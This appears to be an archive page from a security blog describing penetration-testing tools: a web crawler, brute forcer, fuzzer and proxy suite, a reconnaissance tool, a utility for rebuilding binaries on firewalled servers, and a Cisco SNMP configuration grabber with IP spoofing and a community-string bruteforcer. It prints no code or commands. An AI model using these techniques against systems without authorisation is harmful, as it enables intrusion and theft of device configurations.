Archive Tools

WebSurgery v1.0

WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with web application planning and exploitation.

It currently contains a spectrum of efficient, fast and stable tools such as Web Crawler with the embedded File/ Dir Brute forcer, Fuzzer (for advanced exploitation of known and unusual vulnerabilities such as SQL Injections, Cross site scripting (XSS)), Brute force (for login forms and identification of firewall-filtered rules, DOS Attacks) and WEB Proxy (to analyze, intercept and manipulate the traffic between your browser and the target web application).

 

Web Crawler

Web Crawler is designed to be fast, accurate, stable and completely parameterized using advanced techniques to extract links from Javascript and HTML Tags. It works with parameterized timing settings (Timeout, Threading, Max Data Size, Retries) and a number of rule parameters to prevent infinitive loops and pointless scanning (Case Sensitive, Dir Depth, Process Above/Below, Submit Forms, Fetch Indexes/Sitemaps, Max Requests per File/Script Parameters).

It is also possible to apply custom headers (user agent, cookies etc) and Include/Exclude Filters. For example, by default the crawler will scan only the initial web service (url at the specific port), however you could change the initial filter “^($protocol)://($hostport)/” to “^(http|https)://[^/]*\.test.com” to specify the whole domain site for a specific domain using regular expressions (i.e .net) (e.g. for http://test.com, https://test.com, http://www.test.com, https://something.test.com:9443 etc).

Web Crawler also includes an embedded File/Dir Brute Forcer which helps to directly brute force for files/dirs in the directories found from crawling.

Web Bruteforcer

Web Bruteforcer is a brute forcer for files and directories within the web application which helps to identify the hidden structure. As Web Crawler it us multi-threaded and completely parameterized for timing settings (Timeout, Threading, Max Data Size, Retries) and rules (Headers, Base Dir, Brute force Dirs/Files, Recursive, File’s Extension, Send GET/HEAD, Follow Redirects, Process Cookies and List generator configuration).

By default, it will brute force from root / base dir recursively for both files and directories. It sends both HEAD and GET requests when it needs it (HEAD to identify if the file/dir exists and then GET to retrieve the full response).

Web Fuzzer

Web Fuzzer is a highly advanced tool to create a number of requests based on one initial request. Fuzzer has no limits and can be used to exploit known vulnerabilities such as (blind) SQL Inections and more uncommon ways such identifying improper input handling and firewall/filtering rules.

Web Editor

A Web Editor to send individual requests. It also contains a HEX Editor for more advanced requests.

Web Proxy

Web Proxy is a proxy server running locally and will allow you to analyze, intercept and manipulate HTTP/HTTPS requests coming from your browser or other application which support proxies.

 

Download

Share
Photo

root

March 17th

Tools

srgn-InfoGather

One of my old tools which helps for initials steps of Information Gathering. Basic, it works with dig, whois and nmap scan results. Unfortunately, it’s not really user-friendly and not documented. I’ve already coded the basic structure of new information gathering tool, however still needs a looot of work.

Features

For a domain:
- Find Domain’s Name servers (NS Records)
- Find Domain’s Mail servers (MX Records)
- Find sub-domains using Google Search
- Find sub-domains using Brute force
- Find possible Clusters / Balancers (different IP, same Host)
- Find related domains
- Whois Domain details

For Name servers:
- Check Name Servers for Zone-Tranfers
- Check Name Servers for Version Bind (Banner)

For Mail servers:
- Check Mail Servers for User Enumeration (VRFY / EXPN)
- Check Mail Servers for Open Relay

For IP Addresses:
- Find Host Names
- Find Virtual Hosts using Bing API 2.0
- Whois IP details (Gets ISP / LIR details as well)
- Find more IP Ranges based on Net Name
- Find more IP Ranges based on Maintainer (mnt-by)

For Ports (import Nmap xml file):
- Find Port banner
- Find Web (HTTP/HTTPS) Ports
- Find Same Web Sites running on different IP / Port
- Check Web Ports for OPTIONS, Server Banner, Internal IPs exposure

Download

Share
Photo

root

July 28th

Tools

srgn-file2text

It converts a binary file to text and then is possible to recreate the binary file from text on server which has no internet access.

Supports (srgn-file2text-v2.1)

    • Windows Debugger (debug.exe)
    • VBScript
    • JScript

Download source
Download .exe

Related

Creating Binary Files on a Firewalled Server
Download Files using default windows commands

Share
Photo

root

June 23rd

Tools

srgn-ciscoconf

It downloads Cisco configuration file through SNMP protocol using a TFTP server. IP Spoof is possible because SNMP using a parameter for the TFTP’s IP address. Bruteforcer for [spoofed_ips] [community_strings] [cisco_targets] also attached.

Download srgn-ciscoconf-v1.0
Download Bruteforcer

Related

Security Focus – Download
SourceForge – Download
Cisco SNMP configuration attack with a GRE tunnel

Share
Photo

root

June 23rd

Tools
line

© 2017 SuRGeoNix | Security Blog